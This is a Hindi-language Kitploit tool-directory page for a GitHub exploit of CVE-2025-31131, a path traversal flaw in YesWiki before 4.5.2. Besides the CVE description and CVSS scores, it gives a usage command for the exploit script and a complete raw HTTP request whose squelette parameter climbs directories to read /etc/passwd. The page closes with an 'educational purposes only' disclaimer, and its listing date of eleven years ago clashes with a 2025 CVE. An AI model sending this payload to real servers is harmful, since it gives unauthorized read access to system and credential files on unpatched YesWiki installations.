Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Blackash-CVE-2025-31131 — CVE-2025-31131 | Kitploit
उपकरण/GitHubGitHub/gmh5225/blackash-cve-2025-31131
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgmh5225/blackash-cve-2025-31131

Blackash-CVE-2025-31131

CVE-2025-31131

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Blackash-CVE-2025-31131

CVE-2025-31131 - YesWiki < 4.5.2 पाथ ट्रैवर्सल एक्सप्लॉइट

विवरण

YesWiki PHP में लिखी गई एक विकी प्रणाली है। squelette पैरामीटर पाथ ट्रैवर्सल हमलों के प्रति संवेदनशील है, जो सर्वर पर मनमानी फ़ाइलों तक पढ़ने की पहुँच सक्षम बनाता है। यह भेद्यता 4.5.2 में ठीक कर दी गई है।

NIST: NVD बेस स्कोर: 7.5 🔴 उच्च वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CNA: GitHub, Inc बेस स्कोर: 8.6 🔴 उच्च वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C:C:H/I:N/A:N

उपयोग

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 exploit.py -u https://example.com/

बर्प का उपयोग करके मैन्युअल रूप से एक्सप्लॉइट करने का दूसरा तरीका यहाँ है:

root@kitploit:~
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

अस्वीकरण !!!

यह केवल शैक्षिक उद्देश्यों के लिए है।

टूल डाउनलोड करें